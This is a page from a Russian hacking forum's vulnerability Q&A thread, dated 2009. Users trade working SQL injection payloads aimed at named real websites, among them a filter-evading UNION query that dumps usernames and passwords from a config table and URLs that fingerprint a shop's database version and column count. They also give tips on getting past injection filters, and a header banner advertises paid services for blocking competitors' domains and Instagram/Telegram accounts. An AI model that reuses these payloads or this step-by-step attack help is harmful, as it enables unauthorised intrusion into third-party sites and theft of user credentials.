Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1082 из 2438

1082

Опции темы

Поиск в этой теме

Опции просмотра

#10811

17.12.2009, 22:26

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

Цитата:

Сообщение от mailbrush

Потому что таблички users не существует...

PS: Раздражают такие люди, которые любят "п0нт@нутьSя"...

Она существует но пустая

-1%20union%20select%201,2,3,count(*),5,6+from+users--

ЗЫ раньше он вообще на албани писал ((

#10812

17.12.2009, 23:27

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

С нами: 10340793

Репутация: 66

Цитата:

Сообщение от Strilo4ka

YuNi|[c почитай статьи и разберешся если mysql 5 то есть схема, если ниже то брутить таблицы! Есть влом читать то тулзу пашкелы и вперед если надо брутить (и не только) . Если ось win, то в переменных пропишы окружения путь в path до интерпретатора perl и не забуть директиву роскоментировать в апаче если апач ScriptInterpreterSource registry или впишы ели ее нет и перегрузи windows. . потом win+r -> cmd -> perl путь до_тулзи_пашкели и там разберешся

спс я уже про тулзу с его выхода знаю и сам протестил))
Тут не MySql а какой то с нестандартыми ответами Access с Jet компонентом. Все таки не смог брути таблицы никакого, наверное префикс надо гадать.

#10813

17.12.2009, 23:28

M1ks

Участник форума

Регистрация: 23.08.2007

Сообщений: 157

С нами: 9851463

Репутация: 19

как можно выполнить инъекцию если на union на сайте стоит фильтр ?

#10814

17.12.2009, 23:35

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Цитата:

Сообщение от M1ks

как можно выполнить инъекцию если на union на сайте стоит фильтр ?

Все зависит от грамотности фильтра... Поиграйся с регистром и тд... Если ничего не получится - крути как блинд.

#10815

17.12.2009, 23:39

~~[x60]unu~~

Banned

Регистрация: 07.05.2009

Сообщений: 103

С нами: 8954306

Репутация: 1588

mailbrush - так и быть понтанусь
LokbatanLi - )))ya toze pisy translitom

Код:

http://www.section404.org/news.php?id=1/**/and/**/1=0%20/**/union/**/all/**/select/**/0,0,0,concat_ws%280x3a,username,password%29,0,0/**/from/**/config--

#10816

17.12.2009, 23:53

M1ks

Участник форума

Регистрация: 23.08.2007

Сообщений: 157

С нами: 9851463

Репутация: 19

Цитата:

Сообщение от mailbrush

Все зависит от грамотности фильтра... Поиграйся с регистром и тд... Если ничего не получится - крути как блинд.

с регистром не прокатывает..

#10817

18.12.2009, 01:01

~~[x60]unu~~

Banned

Регистрация: 07.05.2009

Сообщений: 103

С нами: 8954306

Репутация: 1588

M1ks мне в лс ссылку если не трудно

#10818

18.12.2009, 07:31

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Цитата:

Сообщение от M1ks

как можно выполнить инъекцию если на union на сайте стоит фильтр ?

При наличии слова он его вырезает, или редирект, etc ?

#10819

18.12.2009, 18:15

Radiator

Участник форума

Регистрация: 17.03.2009

Сообщений: 234

С нами: 9027735

Репутация: 128

http://www.discount.ru/search.html?find=-1%27&search=%E8%F1%EA%E0%F2%FC

нашел. Это sql-inj илил нет?

если да,помогите раскопать дальше

#10820

18.12.2009, 18:35

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

С нами: 10158086

Репутация: 1359

Код:

http://www.discount.ru/search.html?find=1%27+and+1%3C0+or+version%28%29%3C4.1+and+version%28%29%3E3.9%2F*+&search=%E8%F1%EA%E0%F2%FC

версия 4.0*
полей 14, выводится 3е.

Код:

http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4%2F*&search=%E8%F1%EA%E0%F2%FC

зы удаляйте пробелы в коде.

Последний раз редактировалось geezer.code; 18.12.2009 в 19:03..

Страница 1082 из 2438

1082

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход